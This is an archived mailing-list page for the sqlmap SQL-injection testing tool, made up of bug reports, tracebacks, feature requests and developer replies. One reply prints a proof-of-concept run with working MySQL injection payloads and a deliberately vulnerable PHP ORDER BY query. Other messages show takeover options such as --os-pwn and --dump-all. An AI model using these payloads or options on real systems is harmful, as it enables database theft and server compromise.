sqlmap-users Mailing List for sqlmap (Page 97)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Miroslav S. <mir...@gm...> - 2011-04-28 07:08:37
|
It would be great if you could wireshark that icmp traffic and show us what's happening. Thing is that we are really not aware of icmp traffic in normal case. Kr On Thursday, April 28, 2011, Bernardo Damele A. G. <ber...@gm...> wrote: > Hi Goce, > > On 24 April 2011 04:11, Goce Trenchev <amo...@gm...> wrote: >> I've been doing some experiments with sqlmap and I found out that when i >> turn off the icmp so there is no ping reply from the target server, sqlmap >> is not working and it says connection timed out. It would be great if there >> is an option to treat the host online and don't ping it. > > sqlmap only uses ICMP packets when you takeover the back-end DBMS > server and chooses to do it over ICMP tunnel with --os-pwn switch. Is > this the case? If so, run sqlmap as root on Linux (needed in order to > use Impacket and generate arbitrary ICMP echo responses) and, if the > back-end DBMS runs on Windows and the OS/firewall allows ICMP echo > requests to arbitrary targets (read, the sqlmap attacker Linux box) > then the out-of-band will work. > If this is not the case, please do a packet dump of your sqlmap run, > run it with -t traffic.log and -v 3 and send us the full output and > files in order to debug it further, please. > > Regards, > Bernardo > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: 0x05F5A30F > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-28 00:00:00
|
Hi Goce, On 24 April 2011 04:11, Goce Trenchev <amo...@gm...> wrote: > I've been doing some experiments with sqlmap and I found out that when i > turn off the icmp so there is no ping reply from the target server, sqlmap > is not working and it says connection timed out. It would be great if there > is an option to treat the host online and don't ping it. sqlmap only uses ICMP packets when you takeover the back-end DBMS server and chooses to do it over ICMP tunnel with --os-pwn switch. Is this the case? If so, run sqlmap as root on Linux (needed in order to use Impacket and generate arbitrary ICMP echo responses) and, if the back-end DBMS runs on Windows and the OS/firewall allows ICMP echo requests to arbitrary targets (read, the sqlmap attacker Linux box) then the out-of-band will work. If this is not the case, please do a packet dump of your sqlmap run, run it with -t traffic.log and -v 3 and send us the full output and files in order to debug it further, please. Regards, Bernardo -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-27 23:54:12
|
Hi Jacco, On 27 April 2011 10:52, Jacco van Tuijl <jac...@gm...> wrote: > I've been writing some artikel about SQL injection in the ORDER BY clause: > http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/ > > Would be nice to see that implemented in version 1.0 :) sqlmap has support for injection in ORDER BY and GROUP BY clauses since 0.9-dev - about since 6 months or so now. Proof of concept: --8<-- $ python sqlmap.py -u http://debiandev/sqlmap/mysql/get_int_orderby.php?id=1 --level 3 --flush-session sqlmap/1.0-dev (r3772) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 00:49:02 [00:49:02] [INFO] using '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/debiandev/session' as session file [00:49:02] [INFO] flushing session file [00:49:02] [INFO] testing connection to the target url [00:49:02] [INFO] heuristics detected web page charset 'ascii' [00:49:02] [INFO] testing if the url is stable, wait a few seconds [00:49:03] [INFO] url is stable [00:49:03] [INFO] testing if GET parameter 'id' is dynamic [00:49:03] [INFO] confirming that GET parameter 'id' is dynamic [00:49:04] [INFO] GET parameter 'id' is dynamic [00:49:04] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL) [00:49:04] [INFO] testing sql injection on GET parameter 'id' [00:49:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [00:49:04] [INFO] testing 'Generic boolean-based blind - Parameter replace' [00:49:04] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)' [00:49:04] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' [00:49:04] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)' [00:49:04] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' [00:49:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' [00:49:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' injectable [00:49:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [00:49:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [00:49:04] [INFO] testing 'MySQL > 5.0.11 stacked queries' [00:49:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [00:49:54] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable [00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns' [00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns' [00:49:54] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns' [00:49:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [00:49:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [00:49:55] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns' [00:49:55] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns' [00:49:55] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns' GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 193 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (6096=6096) THEN 1 ELSE 6096*(SELECT 6096 FROM information_schema.tables) END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=1 AND (SELECT 3210 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,110,102,58),(SELECT (CASE WHEN (3210=3210) THEN 1 ELSE 0 END)),CHAR(58,104,103,121,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --- [00:50:00] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: MySQL 5.0 [00:50:00] [INFO] Fetched data logged to text files under '/home/inquis/software/sqlmap/subversion/trunk/sqlmap/output/debiandev' [*] shutting down at: 00:50:00 --8<-- As you can see it spotted three different SQL injection techniques against an ORDER BY clause injection point. The original query in the PHP page is: --8<-- $query = "SELECT * FROM users ORDER BY " . $_GET['id']; --8<-- Like I said, this has been tested thoroughly on MySQL and the others DBMS too. > I'm also interested in joining your dev. team. We can discuss it privately, drop us an email to de...@sq.... Regards, Bernardo -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Jacco v. T. <jac...@gm...> - 2011-04-27 09:53:02
|
I've been writing some artikel about SQL injection in the ORDER BY clause: http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/ Would be nice to see that implemented in version 1.0 :) I'm also interested in joining your dev. team. let me know what you think. Many kind regards, Jacco van Tuijl |
|
From: Jacco v. T. <jac...@gm...> - 2011-04-27 09:49:26
|
[11:08:16] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 11 times, 500 (Internal Server Error) - 6103 times
[11:08:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3770), retry
your
run with the latest development version from the Subversion repository. If
the e
xception persists, please send by e-mail to
sql...@li... t
he following text and any information required to reproduce the bug. The
develop
ers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r3770)
Python version: 2.7.1
Operating system: nt
Command line: sqlmap.py -u
*****************************************************
**************************** --dump-all --random-agent --proxy=
http://127.0.0.1:
8118 --check-payload
Technique: UNION
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
File "sqlmap.py", line 83, in main
start()
File "C:\sqlmap-0.9\lib\controller\controller.py", line 485, in start
action()
File "C:\sqlmap-0.9\lib\controller\action.py", line 106, in action
conf.dbmsHandler.dumpAll()
File "C:\sqlmap-0.9\plugins\generic\enumeration.py", line 1525, in dumpAll
data = self.dumpTable()
File "C:\sqlmap-0.9\plugins\generic\enumeration.py", line 1337, in
dumpTable
entries = zip(*[entries[colName] for colName in colList])
KeyError: u'Synonym'
|
|
From: Miroslav S. <mir...@gm...> - 2011-04-27 08:41:07
|
It's not that we expected such large log files, so everything is
loaded into memory and processed. We can adapt and read line by line,
problem will be solved for sure but it would slow down the processing
of the log files.
Will do something regarding later this week.
kr
On Tuesday, April 26, 2011, m4l1c3 <mal...@gm...> wrote:
> Target login page is like: Type a number into a field, a login appears. I log in, and spider with burpsuite. 250mb log file (too much?)
>
> sqlmap version: 1.0-dev (r3770)
> Python version: 2.5.2
> Operating system: posix
> Command line: ./sqlmap.py -l /stough/log --batch --dbs
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
> File "./sqlmap.py", line 75, in main
> init(cmdLineOptions)
> File "/pentest/database/sqlmap-dev/lib/core/option.py", line 1600, in init
> __setMultipleTargets()
> File "/pentest/database/sqlmap-dev/lib/core/option.py", line 332, in __setMultipleTargets
> __feedTargetsDict(conf.list, addedTargetUrls)
> File "/pentest/database/sqlmap-dev/lib/core/option.py", line 296, in __feedTargetsDict
> content = content.replace("\r", "")
> MemoryError
>
>
>
--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
|
|
From: m4l1c3 <mal...@gm...> - 2011-04-26 14:16:13
|
Target login page is like: Type a number into a field, a login appears. I
log in, and spider with burpsuite. 250mb log file (too much?)
sqlmap version: 1.0-dev (r3770)
Python version: 2.5.2
Operating system: posix
Command line: ./sqlmap.py -l /stough/log --batch --dbs
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
File "./sqlmap.py", line 75, in main
init(cmdLineOptions)
File "/pentest/database/sqlmap-dev/lib/core/option.py", line 1600, in init
__setMultipleTargets()
File "/pentest/database/sqlmap-dev/lib/core/option.py", line 332, in
__setMultipleTargets
__feedTargetsDict(conf.list, addedTargetUrls)
File "/pentest/database/sqlmap-dev/lib/core/option.py", line 296, in
__feedTargetsDict
content = content.replace("\r", "")
MemoryError
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-26 08:08:27
|
Thank you guys for your donations. We will drink for you tonight! Hope to see someone joining us, drinks are on us and remember that the pub has a good deal for wine bottles on Tuesdays ;) Cheers, Bernardo Damele A. G. This message was sent from a smartphone On 25 Apr 2011, at 19:24, "ja...@ev..." <ja...@ev...> wrote: > Well, Im trying to get my buddy Bert to go buy them a pint on me. We'll > see if he actually does it. > > On Mon, 25 Apr 2011 14:09:31 -0400 (EDT), Ryan Sears <rd...@mt...> > wrote: >> Which is exactly why I donated to SQLMap last night :). I suggest you >> do the same, because like you said - they freakin made SQLMap! >> >> Ryan >> >> ----- Original Message ----- >> From: ja...@ev... >> To: sql...@li... >> Sent: Monday, April 25, 2011 2:07:48 PM GMT -05:00 US/Canada Eastern >> Subject: Re: [sqlmap-users] meet up in London >> >> Not even one person? You guys are dicks. >> Buy them some pints, they made sqlmap! >> >> -james >> >> On Mon, 25 Apr 2011 11:45:50 -0400, Steven Pinkham >> <ste...@gm...> wrote: >>> Miroslav Stampar wrote: >>>> So nobody is willing to have a drink with us :( >>>> We are both in London few more days so if you change your mind just reply. >>>> >>>> Kr >>> >>> If it makes you feel better, if I was single and didn't have to justify >>> the cost of the plane ticket from the US, I'd totally be there ;-) >> >> >> ------------------------------------------------------------------------------ >> WhatsUp Gold - Download Free Network Management Software >> The most intuitive, comprehensive, and cost-effective network >> management toolset available today. Delivers lowest initial >> acquisition cost and overall TCO of any competing solution. >> http://p.sf.net/sfu/whatsupgold-sd >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> ------------------------------------------------------------------------------ >> WhatsUp Gold - Download Free Network Management Software >> The most intuitive, comprehensive, and cost-effective network >> management toolset available today. Delivers lowest initial >> acquisition cost and overall TCO of any competing solution. >> http://p.sf.net/sfu/whatsupgold-sd >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: David G. <sk...@gm...> - 2011-04-26 03:01:04
|
How about a --count switch? To count the number of rows (like sqlsus do)... and what about column enumerator without setting some table(-T) or DB (-D)? David |
|
From: <ja...@ev...> - 2011-04-25 18:23:45
|
Well, Im trying to get my buddy Bert to go buy them a pint on me. We'll see if he actually does it. On Mon, 25 Apr 2011 14:09:31 -0400 (EDT), Ryan Sears <rd...@mt...> wrote: > Which is exactly why I donated to SQLMap last night :). I suggest you > do the same, because like you said - they freakin made SQLMap! > > Ryan > > ----- Original Message ----- > From: ja...@ev... > To: sql...@li... > Sent: Monday, April 25, 2011 2:07:48 PM GMT -05:00 US/Canada Eastern > Subject: Re: [sqlmap-users] meet up in London > > Not even one person? You guys are dicks. > Buy them some pints, they made sqlmap! > > -james > > On Mon, 25 Apr 2011 11:45:50 -0400, Steven Pinkham > <ste...@gm...> wrote: >> Miroslav Stampar wrote: >>> So nobody is willing to have a drink with us :( >>> We are both in London few more days so if you change your mind just reply. >>> >>> Kr >> >> If it makes you feel better, if I was single and didn't have to justify >> the cost of the plane ticket from the US, I'd totally be there ;-) > > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Ryan S. <rd...@mt...> - 2011-04-25 18:09:39
|
Which is exactly why I donated to SQLMap last night :). I suggest you do the same, because like you said - they freakin made SQLMap! Ryan ----- Original Message ----- From: ja...@ev... To: sql...@li... Sent: Monday, April 25, 2011 2:07:48 PM GMT -05:00 US/Canada Eastern Subject: Re: [sqlmap-users] meet up in London Not even one person? You guys are dicks. Buy them some pints, they made sqlmap! -james On Mon, 25 Apr 2011 11:45:50 -0400, Steven Pinkham <ste...@gm...> wrote: > Miroslav Stampar wrote: >> So nobody is willing to have a drink with us :( >> We are both in London few more days so if you change your mind just reply. >> >> Kr > > If it makes you feel better, if I was single and didn't have to justify > the cost of the plane ticket from the US, I'd totally be there ;-) ------------------------------------------------------------------------------ WhatsUp Gold - Download Free Network Management Software The most intuitive, comprehensive, and cost-effective network management toolset available today. Delivers lowest initial acquisition cost and overall TCO of any competing solution. http://p.sf.net/sfu/whatsupgold-sd _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: <ja...@ev...> - 2011-04-25 18:07:57
|
Not even one person? You guys are dicks. Buy them some pints, they made sqlmap! -james On Mon, 25 Apr 2011 11:45:50 -0400, Steven Pinkham <ste...@gm...> wrote: > Miroslav Stampar wrote: >> So nobody is willing to have a drink with us :( >> We are both in London few more days so if you change your mind just reply. >> >> Kr > > If it makes you feel better, if I was single and didn't have to justify > the cost of the plane ticket from the US, I'd totally be there ;-) |
|
From: Steven P. <ste...@gm...> - 2011-04-25 15:46:02
|
Miroslav Stampar wrote: > So nobody is willing to have a drink with us :( > We are both in London few more days so if you change your mind just reply. > > Kr If it makes you feel better, if I was single and didn't have to justify the cost of the plane ticket from the US, I'd totally be there ;-) -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
|
From: Miroslav S. <mir...@gm...> - 2011-04-25 09:14:55
|
So nobody is willing to have a drink with us :( We are both in London few more days so if you change your mind just reply. Kr On Monday, April 4, 2011, Bernardo Damele A. G. <ber...@gm...> wrote: > Hi, > > Miroslav will be in London later this month and we are thinking about > having a sqlmap users' meet up down town. > The possible date is Tuesday 26th (a w/ after InfoSec marketing/sales > blokes' gathering) from 8:00pm @ The Phoenix[1] located at 37 > Cavendish Square, W1G0PP, London, UK. See the map here[2]. > > To tease the alcoholics.. and I bet there're a lot drunken kiddies in > here ;) ..From the pub's homepage: > """ > EVERY TUESDAY > Wine Night From 6pm > Just because we love you, we decided to bring you something a little > special on a Tuesday night! > > After 6pm ALL of our wine is reduced! > Any bottle under £14 is just £7.95 & > Any bottle over £14 is just £11.95 > So leave the 'house' at home and try something new! > All our bar staff will be more than happy to recommend something, > they're nice like that! > """ > > [1] http://www.phoenixcavendishsquare.co.uk/ > [2] http://bit.ly/f6ZLcg (same pub of DC4420, yeah!) > > Look forward to see you around! > > Cheers, > Bernardo > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: 0x05F5A30F > > ------------------------------------------------------------------------------ > Create and publish websites with WebMatrix > Use the most popular FREE web apps or write code yourself; > WebMatrix provides all the features you need to develop and > publish your website. http://p.sf.net/sfu/ms-webmatrix-sf > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-04-25 09:08:08
|
Hi Tom. I believe i see the connection with our code. That number ranges have the root in programs logic. Will be fixed in a week. After that hackers will be able to dump all :) It's just strange that nobody has noticed this in some two weeks as that's the time of affecting commit. Kr On Sunday, April 24, 2011, Tom Thumb <k1...@li...> wrote: > > > > > > When trying to dump a table containing over 10000 entries, only 32 results are returned (rows with id 8, 9, 90-99, 990-999, 9990-9999). All the other data is not dumped, and I can't understand why. > Can anyone explain this behaviour? > Obviously I'm pleased that my database does not appear to be completely exploitable, but I'm worried that I'm missing something simple, and that there is something a hacker could do to retreive the rest of the data... > Test subject is an MSSQL 2005 Database runing on Windows 2003. > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-04-25 08:58:12
|
Hi Ahmed. Thanks for reporting. This will be fixed at the end of the week. It requires overwritting of some poorly written system methods. Sending from Bernardo's place in London :) KR On Monday, April 25, 2011, Bernardo Damele A. G. <ber...@gm...> wrote: > What is the language of the web application? Can you provide us > privately with full output of -v 3 --flush-session please? > > Bernardo > > On 25 April 2011 09:31, Ahmed Shawky <ah...@is...> wrote: >> it based uploading shell with the latest reversion (r3770) but here is >> another issue >> [10:30:07] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3770), retry >> your run with the latest development version from the Subversion repository. >> If the exception persists, please send by e-mail to >> sql...@li... the following text and any information >> required to reproduce the bug. The developers will try to reproduce the bug, >> fix it accordingly and get back to you. >> sqlmap version: 1.0-dev (r3770) >> Python version: 2.7 >> Operating system: posix >> Command line: ./sqlmap.py -u >> ******************************************************* -p id --text-only >> --cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn >> Technique: UNION >> Back-end DBMS: MySQL (fingerprinted) >> Traceback (most recent call last): >> File "./sqlmap.py", line 83, in main >> start() >> File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, in >> start >> action() >> File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in >> action >> conf.dbmsHandler.osPwn() >> File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 245, in >> osPwn >> self.uploadShellcodeexec(web=web) >> File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 560, in >> uploadShellcodeexec >> self.webFileUpload(self.shellcodeexecLocal, self.shellcodeexecRemote, >> self.webDirectory) >> File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in >> webFileUpload >> retVal = self.__webFileStreamUpload(inputFP, destFileName, directory) >> File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in >> __webFileStreamUpload >> page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, >> raise404=False) >> File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in >> getPage >> conn = multipartOpener.open(url, multipart) >> File "/usr/lib/python2.7/urllib2.py", line 391, in open >> response = self._open(req, data) >> File "/usr/lib/python2.7/urllib2.py", line 409, in _open >> '_open', req) >> File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain >> result = func(*args) >> File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open >> return self.do_open(httplib.HTTPConnection, req) >> File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open >> h.request(req.get_method(), req.get_selector(), req.data, headers) >> File "/usr/lib/python2.7/httplib.py", line 946, in request >> self._send_request(method, url, body, headers) >> File "/usr/lib/python2.7/httplib.py", line 987, in _send_request >> self.endheaders(body) >> File "/usr/lib/python2.7/httplib.py", line 940, in endheaders >> self._send_output(message_body) >> File "/usr/lib/python2.7/httplib.py", line 801, in _send_output >> msg += message_body >> UnicodeDecodeError: 'ascii' codec can't decode byte 0x84 in position 396: >> ordinal not in range(128) >> [*] shutting down at: 10:30:07 >> On Mon, Apr 25, 2011 at 10:27 AM, Ahmed Shawky <ah...@is...> wrote: >>> >>> there is an issue when sqlmap comes to shell upload via os-shell or >>> os-pwn >>> [10:24:59] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3767), retry >>> your run with the latest development version from the Subversion repository. >>> If the exception persists, please send by e> ------------------------------------------------------------------------------ >> Fulfilling the Lean Software Promise >> Lean software platforms are now widely adopted and the benefits have been >> demonstrated beyond question. Learn why your peers are replacing JEE >> containers with lightweight application servers - and what you can gain >> from the move. http://p.sf.net/sfu/vmware-sfemails >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: 0x05F5A30F > > ------------------------------------------------------------------------------ > Fulfilling the Lean Software Promise > Lean software platforms are now widely adopted and the benefits have been > demonstrated beyond question. Learn why your peers are replacing JEE > containers with lightweight application servers - and what you can gain > from the move. http://p.sf.net/sfu/vmware-sfemails > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-25 08:37:08
|
What is the language of the web application? Can you provide us privately with full output of -v 3 --flush-session please? Bernardo On 25 April 2011 09:31, Ahmed Shawky <ah...@is...> wrote: > it based uploading shell with the latest reversion (r3770) but here is > another issue > [10:30:07] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3770), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r3770) > Python version: 2.7 > Operating system: posix > Command line: ./sqlmap.py -u > ******************************************************* -p id --text-only > --cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn > Technique: UNION > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 83, in main > start() > File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, in > start > action() > File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in > action > conf.dbmsHandler.osPwn() > File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 245, in > osPwn > self.uploadShellcodeexec(web=web) > File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 560, in > uploadShellcodeexec > self.webFileUpload(self.shellcodeexecLocal, self.shellcodeexecRemote, > self.webDirectory) > File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in > webFileUpload > retVal = self.__webFileStreamUpload(inputFP, destFileName, directory) > File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in > __webFileStreamUpload > page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, > raise404=False) > File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in > getPage > conn = multipartOpener.open(url, multipart) > File "/usr/lib/python2.7/urllib2.py", line 391, in open > response = self._open(req, data) > File "/usr/lib/python2.7/urllib2.py", line 409, in _open > '_open', req) > File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain > result = func(*args) > File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open > return self.do_open(httplib.HTTPConnection, req) > File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open > h.request(req.get_method(), req.get_selector(), req.data, headers) > File "/usr/lib/python2.7/httplib.py", line 946, in request > self._send_request(method, url, body, headers) > File "/usr/lib/python2.7/httplib.py", line 987, in _send_request > self.endheaders(body) > File "/usr/lib/python2.7/httplib.py", line 940, in endheaders > self._send_output(message_body) > File "/usr/lib/python2.7/httplib.py", line 801, in _send_output > msg += message_body > UnicodeDecodeError: 'ascii' codec can't decode byte 0x84 in position 396: > ordinal not in range(128) > [*] shutting down at: 10:30:07 > On Mon, Apr 25, 2011 at 10:27 AM, Ahmed Shawky <ah...@is...> wrote: >> >> there is an issue when sqlmap comes to shell upload via os-shell or >> os-pwn >> [10:24:59] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3767), retry >> your run with the latest development version from the Subversion repository. >> If the exception persists, please send by e-mail to >> sql...@li... the following text and any information >> required to reproduce the bug. The developers will try to reproduce the bug, >> fix it accordingly and get back to you. >> sqlmap version: 1.0-dev (r3767) >> Python version: 2.7 >> Operating system: posix >> Command line: ./sqlmap.py -u >> ******************************************************* -p id --text-only >> --cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn >> Technique: UNION >> Back-end DBMS: MySQL (fingerprinted) >> Traceback (most recent call last): 